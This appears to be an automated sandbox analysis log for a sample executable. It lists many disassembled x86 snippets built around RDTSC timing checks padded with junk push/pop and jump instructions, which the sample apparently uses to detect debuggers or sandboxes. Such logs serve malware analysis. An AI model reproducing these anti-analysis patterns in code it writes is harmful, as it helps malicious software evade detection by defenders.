    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF9001 second address: FF903D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DB209h 0x00000009 popad 0x0000000a jmp 00007FD8346DB202h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 jnc 00007FD8346DB1F6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF903D second address: FF904C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FD8346DCB26h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF904C second address: FF905B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD8346DB1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF905B second address: FF9063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF942B second address: FF942F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF942F second address: FF9452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD8346DCB37h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF9452 second address: FF9456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF9456 second address: FF9484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FD8346DCB2Ch 0x0000000d jmp 00007FD8346DCB32h 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FD8346DCB26h 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF974D second address: FF9769 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FD8346DB203h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF9769 second address: FF976E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF9C99 second address: FF9C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF9C9F second address: FF9CBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF9CBB second address: FF9CDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DB209h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF9CDC second address: FF9CE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFB99D second address: FFB9A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEBB8 second address: FFEBD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB30h 0x00000007 je 00007FD8346DCB32h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEBD2 second address: FFEBD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10016E5 second address: 10016EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10016EF second address: 10016F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10016F5 second address: 10016F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10016F9 second address: 10016FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10016FD second address: 1001711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD8346DCB2Bh 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1001711 second address: 1001717 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1001717 second address: 100172C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD8346DCB2Bh 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1003828 second address: 100382D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100382D second address: 1003841 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD8346DCB2Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1006364 second address: 1006383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD8346DB1FAh 0x0000000a jl 00007FD8346DB1FCh 0x00000010 jp 00007FD8346DB1F6h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1006383 second address: 1006387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B385 second address: 100B39B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD8346DB1FBh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B39B second address: 100B39F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A7F8 second address: 100A810 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD8346DB1FDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A810 second address: 100A81B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A81B second address: 100A825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD8346DB1F6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A998 second address: 100A99E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A99E second address: 100A9BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DB208h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A9BA second address: 100A9C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FD8346DCB26h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A9C8 second address: 100A9DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DB1FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A9DC second address: 100A9FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DCB37h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A9FE second address: 100AA02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100AB3D second address: 100AB46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100AB46 second address: 100AB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10104AE second address: 10104B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10104B2 second address: 10104CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DB1FFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FD8346DB1F6h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10104CF second address: 1010511 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FD8346DCB30h 0x0000000c pushad 0x0000000d jmp 00007FD8346DCB34h 0x00000012 jmp 00007FD8346DCB2Fh 0x00000017 jnc 00007FD8346DCB26h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1010511 second address: 101051B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10107D3 second address: 10107F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DCB2Ch 0x00000009 popad 0x0000000a jmp 00007FD8346DCB31h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1014501 second address: 1014505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1014505 second address: 101450E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101450E second address: 101451D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FD8346DB1F6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013C7B second address: 1013C7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013C7F second address: 1013C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013C8A second address: 1013CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD8346DCB26h 0x0000000a jmp 00007FD8346DCB2Fh 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013CA7 second address: 1013CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013CAD second address: 1013CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013CB5 second address: 1013CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 js 00007FD8346DB1F6h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013DD8 second address: 1013DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FD8346DCB2Fh 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013F62 second address: 1013F68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013F68 second address: 1013F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD8346DCB2Ah 0x0000000c jo 00007FD8346DCB26h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013F82 second address: 1013F8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FD8346DB1F6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C2DC second address: 101C2EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DCB2Eh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C2EE second address: 101C2F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C2F4 second address: 101C2FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C2FA second address: 101C306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FD8346DB1F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C306 second address: 101C30A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101A369 second address: 101A380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD8346DB203h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101A4A8 second address: 101A4DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD8346DCB31h 0x0000000c jmp 00007FD8346DCB2Bh 0x00000011 jmp 00007FD8346DCB2Eh 0x00000016 popad 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101A4DD second address: 101A4EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FD8346DB1F6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101A63C second address: 101A642 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101A642 second address: 101A654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DB1FEh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101AF75 second address: 101AF7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101AF7B second address: 101AF84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101B206 second address: 101B20A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101B20A second address: 101B20E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101B20E second address: 101B217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101BFF1 second address: 101BFF7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101BFF7 second address: 101C005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FD8346DCB26h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F266 second address: 101F2B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DB200h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FD8346DB1F8h 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FD8346DB206h 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007FD8346DB200h 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F2B0 second address: 101F2B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F2B6 second address: 101F2C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jc 00007FD8346DB200h 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F687 second address: 101F69C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD8346DCB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jo 00007FD8346DCB5Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F69C second address: 101F6AA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F6AA second address: 101F6AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F6AE second address: 101F6B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101FC23 second address: 101FC49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD8346DCB2Ah 0x00000009 jmp 00007FD8346DCB38h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101FC49 second address: 101FC4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101FDAC second address: 101FDB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101FDB0 second address: 101FDB6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101FDB6 second address: 101FDE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD8346DCB37h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FD8346DCB30h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101FDE7 second address: 101FE0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DB204h 0x00000007 jl 00007FD8346DB1F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 jng 00007FD8346DB1F6h 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10247C7 second address: 10247E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DCB39h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10247E4 second address: 10247F9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FD8346DB200h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B2E1 second address: 102B306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD8346DCB26h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jne 00007FD8346DCB2Ch 0x00000013 jbe 00007FD8346DCB28h 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e pop eax 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BADF second address: 102BB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 jmp 00007FD8346DB205h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD8346DB1FFh 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BC53 second address: 102BC58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BC58 second address: 102BC73 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD8346DB1F8h 0x00000008 push edi 0x00000009 je 00007FD8346DB1F6h 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BC73 second address: 102BCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 jmp 00007FD8346DCB38h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jno 00007FD8346DCB26h 0x00000015 jmp 00007FD8346DCB2Fh 0x0000001a popad 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102CE86 second address: 102CEA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD8346DB208h 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10338C3 second address: 10338DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD8346DCB31h 0x0000000f rdtsc
